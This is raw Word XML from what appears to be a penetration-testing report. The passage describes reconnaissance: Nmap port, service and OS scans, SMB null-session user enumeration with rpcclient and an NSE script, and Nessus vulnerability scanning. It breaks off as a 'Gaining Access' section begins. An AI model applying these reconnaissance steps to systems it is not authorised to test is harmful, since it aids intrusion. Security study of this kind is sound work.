        </w:rPr>
        <w:t xml:space="preserve"> the system </w:t>
      </w:r>
      <w:r w:rsidR="00F30D96" w:rsidRPr="00FA5B3B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="006734ED" w:rsidRPr="00FA5B3B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="006734ED" w:rsidRPr="00FA5B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734ED" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006734ED" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> packets</w:t>
      </w:r>
      <w:r w:rsidR="001920B9" w:rsidRPr="00FA5B3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180037834"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001920B9" w:rsidRPr="00FA5B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920B9" w:rsidRPr="00FA5B3B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Nma \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="001920B9" w:rsidRPr="00FA5B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30949" w:rsidRPr="00FA5B3B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>(Nmap, 2023)</w:t>
          </w:r>
          <w:r w:rsidR="001920B9" w:rsidRPr="00FA5B3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C83249" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, so combining </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00944A7D" w:rsidRPr="00FA5B3B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="00944A7D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24130B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>port scan and OS detection is a good option to save time.</w:t>
      </w:r>
      <w:r w:rsidR="007E7FCD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ref</w:t>
      </w:r>
      <w:r w:rsidR="006C3E96" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">er </w:t>
      </w:r>
      <w:r w:rsidR="00E065C5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to figure 8 for Nessus port scan</w:t>
      </w:r>
      <w:r w:rsidR="00901DBA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F65E6" w:rsidRPr="00FA5B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5E6"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A0F2ECF" wp14:editId="5D904143">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>981710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5661660" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="21227284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28407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F8C36" w14:textId="2C3730B1" w:rsidR="000E0FDC" w:rsidRPr="00FA5B3B" w:rsidRDefault="0024130B" w:rsidP="00D471D6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11 Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00944A7D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00944A7D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="000E0FDC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="007E7FCD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, service version</w:t>
      </w:r>
      <w:r w:rsidR="000E0FDC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and OS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A46890" w14:textId="77777777" w:rsidR="004F65E6" w:rsidRPr="00FA5B3B" w:rsidRDefault="004F65E6" w:rsidP="004843DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E541AEC" w14:textId="0A28967D" w:rsidR="00D471D6" w:rsidRPr="00FA5B3B" w:rsidRDefault="004F65E6" w:rsidP="004843DE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3F27F94" wp14:editId="5221EF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54040" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="140413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190" name="Picture 140413619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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56540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43DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig.12 Nmap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004843DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004843DE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DE9E2" w14:textId="7E2C7244" w:rsidR="00CD37F6" w:rsidRPr="00FA5B3B" w:rsidRDefault="004843DE" w:rsidP="004843DE">
      <w:pPr>
        <w:jc w:val="both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ab/>
      </w:r>
      <w:r w:rsidR="0061758E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00A961EE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>performs user enumeration</w:t>
      </w:r>
      <w:r w:rsidR="006F30A4" w:rsidRPr="00FA5B3B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="006F30A4" w:rsidRPr="00FA5B3B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="006F30A4" w:rsidRPr="00FA5B3B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="00896434" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E853E0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, refer to appendix 2</w:t>
      </w:r>
      <w:r w:rsidR="0009380A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE93E9" w14:textId="48D021CE" w:rsidR="00CD37F6" w:rsidRPr="00FA5B3B" w:rsidRDefault="005409A4" w:rsidP="00EC54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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00AA22D8" w:rsidRPr="00FA5B3B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AA22D8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004E4EF7" w:rsidRPr="00FA5B3B"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 w:rsidR="00896434" w:rsidRPr="00FA5B3B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="00896434" w:rsidRPr="00FA5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43D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smb-enum-users.</w:t>
      </w:r>
      <w:r w:rsidR="00054FCA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC616A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57478E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="0031349F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, use -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0031349F" w:rsidRPr="00FA5B3B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="0031349F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to run a set common script on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0031349F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="133487FE" w14:textId="23A222B7" w:rsidR="005409A4" w:rsidRPr="00FA5B3B" w:rsidRDefault="005409A4" w:rsidP="00E853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5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00896434" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896434" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: user enumeration </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>through null section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56447A3C" w14:textId="5050FA13" w:rsidR="00CD37F6" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F8338E" w:rsidP="00E853E0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After enumeration, there are </w:t>
      </w:r>
      <w:r w:rsidR="009F2EC7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">a total of 35 </w:t>
      </w:r>
      <w:r w:rsidR="00A86154" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidR="001D6DCF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>in the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2738FDC2" w14:textId="169C38F1" w:rsidR="00F60B41" w:rsidRPr="00FA5B3B" w:rsidRDefault="00BA0460" w:rsidP="00866F15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ab/>
        <w:t xml:space="preserve">Finally, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00ED3D6C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r w:rsidR="004D6DC0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00ED3D6C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner</w:t>
      </w:r>
      <w:r w:rsidR="004D6DC0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00ED3D6C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find potential exploits</w:t>
      </w:r>
      <w:r w:rsidR="00F60B41"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A11AB11" wp14:editId="54842584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5731510" cy="2609215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2105365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65247" name="Picture 21053652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49F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C6713C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F748E3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nessus </w:t>
      </w:r>
      <w:r w:rsidR="007C689B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>offers many types of vulnerability scan</w:t>
      </w:r>
      <w:r w:rsidR="002C6897" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the attacker to use</w:t>
      </w:r>
      <w:r w:rsidR="00F60B41" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15328315" w14:textId="53C14B07" w:rsidR="00F60B41" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F60B41" w:rsidP="00F60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</w:rPr>
        <w:t>Fig.13 Nessus basic network vulnerability scan result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC2334" w14:textId="65ED9474" w:rsidR="00F60B41" w:rsidRPr="00FA5B3B" w:rsidRDefault="00D70909" w:rsidP="004B718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Notably, the methods used </w:t>
      </w:r>
      <w:r w:rsidR="00A25664" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">above may alert </w:t>
      </w:r>
      <w:r w:rsidR="0092235A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the intruder detection system, resulting in</w:t>
      </w:r>
      <w:r w:rsidR="00BA4157" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="0092235A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BA4157" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ip address</w:t>
      </w:r>
      <w:r w:rsidR="0092235A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BA4157" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>block. Furthermore, server</w:t>
      </w:r>
      <w:r w:rsidR="005E734F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">s may </w:t>
      </w:r>
      <w:r w:rsidR="00F2618F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>be aware of</w:t>
      </w:r>
      <w:r w:rsidR="005E734F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the scan and can lie to</w:t>
      </w:r>
      <w:r w:rsidR="004B7184" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide false positive.</w:t>
      </w:r>
      <w:r w:rsidR="00F6696B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatic </w:t>
      </w:r>
      <w:r w:rsidR="00BD52E5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>are reliable but requires the hacker to verify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722856C5" w14:textId="4FA96B92" w:rsidR="00001D3E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00001D3E" w:rsidP="00001D3E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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87D31E" w14:textId="67BEA911" w:rsidR="006E4284" w:rsidRPr="00FA5B3B" w:rsidRDefault="00245200" w:rsidP="00FF1227">
      <w:pPr>
        <w:jc w:val="both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>Using information gathered from previous phases, the attack</w:t>
      </w:r>
      <w:r w:rsidR="00D47E1A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">er attempts to </w:t>
      </w:r>
      <w:r w:rsidR="008148AD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00D47E1A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the system</w:t>
      </w:r>
      <w:r w:rsidR="008148AD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for administrative access</w:t>
      </w:r>
      <w:r w:rsidR="002E6C82" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00016F64" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> This phase </w:t>
      </w:r>
      <w:r w:rsidR="00B34FE9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>demonstrates</w:t>
      </w:r>
      <w:r w:rsidR="00016F64" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> how </w:t>
      </w:r>
      <w:r w:rsidR="00B34FE9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a hacker can penetrate security defences</w:t>
      </w:r>
      <w:r w:rsidR="008F43D2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Upon succes</w:t>
      </w:r>
      <w:r w:rsidR="00C60115" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">s, the hacker has full control of the system and may </w:t>
      </w:r>
      <w:r w:rsidR="00021218" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>perform further exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00F15421" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as data </w:t>
      </w:r>
      <w:r w:rsidR="009317E8" w:rsidRPr="00FA5B3B">
        <w:rPr>
